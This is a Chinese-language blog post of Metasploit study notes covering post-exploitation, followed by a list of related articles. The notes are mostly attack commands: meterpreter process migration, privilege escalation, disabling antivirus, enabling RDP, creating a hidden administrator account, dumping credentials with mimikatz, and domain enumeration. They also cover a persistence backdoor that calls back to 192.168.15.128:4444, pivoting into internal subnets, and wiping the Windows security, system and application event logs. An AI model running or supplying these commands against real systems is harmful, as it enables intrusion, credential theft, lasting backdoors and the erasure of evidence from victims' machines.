metasploit基础学习 渗透(拿shell)和后渗透(留后门)

最新推荐文章于 2024-05-29 09:33:01 发布
最新推荐文章于 2024-05-29 09:33:01 发布
阅读量3.4k 收藏 35
点赞数 2
分类专栏: 工具使用 文章标签: metasploit 渗透学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38348692/article/details/99118825
版权

  1. 使用metasploit时,要保持更新的好习惯,更新kali源 ,以及漏洞数据库,更新命令:
    (1)apt-get update:更新软件包的索引源,作用是同步源的软件包索引
    (2)apt-get upgrade: 升级系统上安装的所有软件包
    (3)apt-get dist-upgrade: 升级整个linux系统,包括内核升级

  2. 专业术语
    (1)Auxiliaries:辅助模块,负责执行扫描,嗅探,指纹识别等功能。
    (2)exploit:漏洞利用模块
    (3)payload:攻击载荷模块
    (4)post:后期渗透模块
    (5)encoders:编码工具模块,负责免杀,以防止被杀毒软件,防火墙等安全软件检测出来

  3. 常用的扫描模块,见图片
    在这里插入图片描述

  4. 在使用 nmap模块时,输入nmap -O -Pn或者nmap -O -P0(数字0) 表示不使用ping的方式,可以穿透防火墙。(不太好用)

  5. 进程迁移:但获取到meterpreter shell 时 ,该shell极其脆弱,可以把它和目标机中的一个稳定进程绑定在一起
    命令过程:在meterpreter下进行

    ps
    getpid :查看meterpreter shell的pid,一般吧迁移到explorer.exe的进程中,其比较稳定
    migrate 448 :把进程迁移到448进程中
    run post/windows/gather/checkvm 命令检查目标机是否运行在虚拟机上
    sysinfo 查看目标机的系统信息
    idletime 查看目标机最近运行时间。
    route 查看目标机完整的网络设置
    getuid 查看当前目标主机已经渗透成功的用户名
    getsystem 提权
    run post/windows/manage/killav 关闭目标主机系统的杀毒软件
    run post/windows/manage/enable_rdp 启动目标机的远程桌面协议,即3389
    run post/windows/manage/autoroute 查看本地子网情况
    background 将当前meterpreter终端隐藏在后台
    route add 添加路由命令
    run post/windows/gather/enum_logged_on_users 列举当前有多少用户登录了目标机
    run post/windows/gather/enmu_applications 列举安装在目标主机上的应用程序

  6. 提权:

    shell 进入shell

    			chcp 65001 解决进入shell中中文乱码
			whoami/groups  查看我们当前的权限
			getuid   查看已经获得的权限
			systeminfo  查看系统信息,以及已打的补丁
			netstat -an   查看开启端口号
			net user  username  password /add    windows 中添加用户
			net localgroup administrators username   /add  把添加的用户添加到管理员组
			useradd –g 组名 用户名 linux下添加用户到root组
			
**使用mimikatz抓取密码**:用于在meterpreter模式下提权为systerm,在32位的进程中比较强大

			(1)在windows 2000 和 windowsxp中无法使用   
			(2)mimikatz_command -f hash ::
			(3)kerberos  抓取系统票据
			(4)wdigest  获取系统账户信息
	查询域名称:net view /domain
	查询域内计算机:net view /doamin:xx
	查询域控制器时间:net time /domain
	查询域管理用户:net group "domain admins" /domain
	得到域控制主机名:net group "domain controllers" /domain
	获取域控主机名:net group "domain controllers" /domain

    创建后门session:
    (1)在meterpreter中执行:
    persistence后门:
    run persistence -A -S -U -i 60 -p 4444 -r 192.168.15.128
    创建跳板机实现内网漫游:
    在拿到meterpreter 添加路由,以session为跳板:
    (1)run get_local_subnets: 获取子网网段
    在这里插入图片描述
    (2)run autoroute -s 192.168.110.0/24
    在这里插入图片描述
    (3)run autoroute -p: 查看路由信息
    (4)background : session 后台运行
    在这里插入图片描述
    在这以后跳板机已将创建完成,完成以后对内网的扫描攻击都要在该msf命令框中实现

    最后:clearrev 清除meterpreter的连接
    sessions -K 清除mfssession
    在windows下dos窗口清除日志信息:

    C:\Windows\system32>wevtutil cl security
C:\Windows\system32>wevtutil cl system
C:\Windows\system32>wevtutil cl application
KingCarzy
关注
  • 2
    点赞
  • 35
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
使用Metasploit 获取远程 shell
KKKmeng的博客
06-08 244
The Metasploit Framework的简称。MSF高度模块化,即框架由多个module组成,是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新。metasploit涵盖了渗透测试中全过程,你可以在这个框架下利用现有的Payload进行一系列的渗透测试。
信息安全技术(二)-- 利用 metasploit 创建并反弹 shell
yi23456qi的博客
06-19 466
知识是不断从学习中得到的,经验是从尝试中得到的!
MSF后渗透权限维持
轻舟已过万重山
09-25 562
MSF后渗透阶段,创建后门用户,权限维持,后门维持的学习
12.3、后渗透测试--持久化后门
无痕的博客
12-13 2195
metasploit渗透测试--持久化后门
Metasploit 内网渗透四 —Metasploit 渗透测试之利用木马、病毒实施渗透1 — 制作 windows 和 linux 客户端恶意软件进行渗透
最新发布
天下著书立传者,皆为我师
05-29 1006
通过制作含病毒和木马的恶意程序,利用msfvenom模块,完成靶机与msf相应的通信
靶机渗透测试实战(一)——拿下shell之后的操作、SUID的解释
weixin_45116657的博客
09-25 2920
理论基础: 1、使用arp-scan -l命令进行主机扫描,确定主机ip; arp-scan是一个用来进来系统发现和指纹识别的命令行工具。它可以构建并发送ARP请求到指定的IP地址,并且显示返回的任何响应。 arp-scan是Kali Linux自带的一款ARP扫描工具。该工具可以进行单一目标扫描,也可以进行批量扫描。批量扫描的时候,用户可以通过CIDR、地址范围或者列表文件的方式指定。该工具...
渗透】windows渗透后门用户的添加方法探究
V1040375575的博客
05-20 1863
0X01 基础:激活Guest用户 net user guest active/yes net user guest xxxx net loaclgroup administrators guest /add 清清楚楚guest用户上线了…… 仿佛在给管理员明确的暗示你已经进来了 0X02 进阶:创建“隐藏”用户 我们也听说过有一种隐形账户,类似于admin$这样的,这样网上说管理员就看不到了,是不是这样呢?我们我也特地试验了一下。 首先,我们创建 admin$用户如下: net user admin
Metasploit--后渗透--创建一个新账号
千寻的博客
02-18 3061
文章目录查看目标主机有哪些用户可以在目标系统中创建一个新的用户账号查看系统用户组将hack用户添加到管理员用户组。 查看目标主机有哪些用户 run post/windows/gather/enum_logged_on_users 可以在目标系统中创建一个新的用户账号 run getgui -u hack -p qwe 这个命令会创建用户,并把他添加到 Administrators 组中,这样该用户就拥有远程桌面的权限了。这里成功创建了用户,但是添加到Administrators组中失败了 ! 如果
Metasploit可执行后门.doc
12-01
Metasploit可执行后门 Metasploit是一款开源的渗透测试框架,提供了一个功能强大且灵活的平台,用于渗透测试和漏洞...Metasploit可执行后门渗透测试和漏洞利用的重要工具,但需要谨慎使用,以避免带来不必要的风险。
利用Metasploit进行渗透测试.doc
08-08
### Metasploit渗透测试经典流程详解 #### 一、引言 Metasploit是一款功能强大的渗透测试框架,被广泛应用于安全审计与攻击模拟等领域。它提供了丰富的漏洞利用模块及多种后渗透工具,使得用户能够对目标系统进行...
网络攻击与防御-第四章 Metasploit渗透攻击.pptx
06-29
Metasploit渗透攻击详解】 Metasploit是一个广泛使用的开源渗透测试框架,它为安全研究人员和道德黑客提供了大量工具和资源,以便评估网络防御的有效性并发现潜在的安全漏洞。Metasploit Framework(MSF)的核心...
渗透测试工具——Metasploit
热门推荐
weixin_59872639的博客
01-14 3万+
Metasplout简介 Metasploit是一款开源的安全漏洞检测工具,同时Metasploit是免费的工具。 Metasploit核心中绝大部分有Rudy实现,一小部分由汇编和C语言实现。 kali中自带Metasploit Metasploit文件结构与模块 路径: /usr/share/metasploit-framework/ config: MSF环境配置信息,数据库配置信息 data:后渗透模块的一些工具及payload,第三方小工具集合,用户字典等数据信息 doc
metasploit获取shell之后进一步利用!metasploit+sessions
weixin_34060741的博客
11-30 1286
当你用metasploit成功的***一台Windows主机后,你会获得一个Meterpreter 的Shell,今天我就会给大家讲一讲Meterpreter 获取shell以后的运用 当你看到了 [*] Meterpreter session 1 opened (192.168.195.140:4444 -> 192.168.195.139:1051) 这就代...
kali使用Metasploit Framework(msf)获取shell
Mrw的博客
04-05 2789
简介 Metasploit Framework是一个编写,测试和使用exploit代码的完善环境。这个环境为渗透测试,shellcode编写和漏洞研究提供了一个可靠的平台,这个框架主要是由面向对象的Ruby编程语言编写的,并带有由C语言,汇编程序和Python编写的可选组件。 Msfconsole提供了一个一体化的集中控制台。通过msfconsole,你可以访问和使用所有的metasploit的插...
34. Metasploit通过samba服务获取shell
__Qian的博客
03-13 776
1.使用nmap扫描端口 2.收集到目标机相关信息后,为其选择正确的Exploit和合适的Payload,从扫描结果发现主机运行着Samba 3.x服务 输入search samba 命令搜索Smaba的漏洞利用模块 3.选择漏洞利用模块 因为exploit/multi/samba/usermap_script 模块被标记为“Excellent”,即为最杰出而且时间是最新的,选择次模块进行渗透...
永恒之蓝ms17-010漏洞利用(提取meterpreter权限获取shell,进入windows 远程操控主机)
qq_42527761的博客
07-19 1万+
最近在学习The-Hacker-Playbook-3这本书,书中介绍的红队的第一个核心工具:Metasploit 框架,尽管 Metasploit 框架从 2003 年开发的,但它现在仍然是一个非常棒的工具。有最初的开发者 H.D. Moore 和非常活跃的社区为它提供持续支持。这个社区的驱动的框架,拥有着所有最新的公开漏洞的利用、后渗透利用模块、辅助模块等等。对于红队项目,我们可以使用 Metasploit 通过MS17-010永恒之蓝漏洞危害内部系统,以获得我们的第一个内网 shell,或者
metasploit使用方法
qq_54030686的博客
11-16 1116
metasploit使用 主要功能 可以对目标进行扫描探测,漏洞利用,提权,获取hash以及横向渗透 分为正向连接和反向连接,即主机连接目标,目标连接主机 反向连接优势:即使目标存在waf,生成的木马不被检测即可反弹shell 本机ip为192.168.0.2 监听端口为4444 目标主机为192.168.0.5,已获取目标低权限shell 设置端口时可以设置为8080,22,80等常见端口,避免防火墙检测 主要流程为 生成木马,上传目标主机(执行木马获取shell)或者直接使用exp获取shell 生成二
MSF后渗透模块Meterpreter
LainWith的博客
01-27 4282
目录后门persistencemetsvc图形界面getgui信息收集判断目标是不是虚拟机arp主机发现nmap主机发现dumplink-最近访问的文件记录enum_applications-安装的软件收集补丁信息键盘记录抓包浏览器系统口令kiwi内网渗透开启远程桌面添加路由445端口扫描哈希值传递攻击-psexecPortfwd端口转发域信息收集密码喷射令牌窃取痕迹清理 后门 由于 Meterpreter是仅仅驻在内存中的 Shellcode,一旦目标主机重启,将失去这台机器的控制权,如果管理员将利用的
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值